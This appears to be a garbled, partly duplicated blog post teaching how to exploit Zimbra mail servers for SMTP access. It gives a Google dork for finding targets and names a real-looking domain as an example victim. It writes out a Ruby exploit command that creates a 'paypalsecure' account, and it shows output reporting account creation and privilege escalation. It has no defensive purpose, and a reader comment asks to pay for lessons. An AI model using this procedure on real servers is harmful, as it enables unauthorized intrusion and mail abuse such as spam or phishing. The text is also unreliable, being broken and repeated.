How to Exploit Zimbra (Get SMTP)
Okay meet again with me Uncle Tom ,
Here I teach to share about how to exploit zimbra for smtp ,
for an explanation with it:
Installation steps and how to use in cmd
Install ruby to finish in program files c: \
Download exploit its db
After downloaded who forgot to extract its files in the program files ruby
ruby - bin ; extract here
Open cmd
ruby run.rb -t http://www.target.com
His command right path
" Cd c : \ ruby \ bin " without the quotation *
To find the target need dork zimbra , ane only give one dork
inurl : "web client login zimbra "
For other dork dork please find and develop their own
Step find targets :
- Go to google.com
- Enter a dork above was added to google
- example : http://tangguh.co.id/questions/linux-server-73/customize-zimbra-web-client-login-screen-in-v8-4175450789/
- download website domain only, http://tangguh.co.id
- Copy and Paste in cmd who had been given the order ,
- ruby run.rb mail.tangguh.co.id -t -p -u paypalsecure aa11AA11
- Then see the results
If there is a successful case of this notice in cmd
[*]Looking if host is vuln....
[+] Host is vuln exploiting...
[+] Obtaining Domain Name
[+] Creating Account
[+] Elevating Privileges
examples of successful image :
Thanks
Okay meet again with me Uncle Tom ,
Here I teach to share about how to exploit zimbra for smtp , for an explanation with it:
Here I teach to share about how to exploit zimbra for smtp , for an explanation with it:
Installation steps and how to use in cmd
Install ruby to finish in program files c: \
Download exploit its db
After downloaded who forgot to extract its files in the program files ruby
ruby - bin ; extract here
Open cmd
ruby run.rb -t http://www.target.com
His command right path
" Cd c : \ ruby \ bin " without the quotation *
To find the target need dork zimbra , ane only give one dork
inurl : "web client login zimbra "
For other dork dork please find and develop their own
Step find targets :
- Go to google.com
- Enter a dork above was added to google
- example : http://tangguh.co.id/questions/linux-server-73/customize-zimbra-web-client-login-screen-in-v8-4175450789/
- download website domain only, http://tangguh.co.id
- Copy and Paste in cmd who had been given the order ,
- ruby run.rb mail.tangguh.co.id -t -p -u paypalsecure aa11AA11
- Then see the results
If there is a successful case of this notice in cmd
[*]Looking if host is vuln....
[+] Host is vuln exploiting...
[+] Obtaining Domain Name
[+] Creating Account
[+] Elevating Privileges
[+] Obtaining Domain Name
[+] Creating Account
[+] Elevating Privileges
examples of successful image :
Thanks
Please How much can I pay you to teach me this Zimbra exploit?
ReplyDelete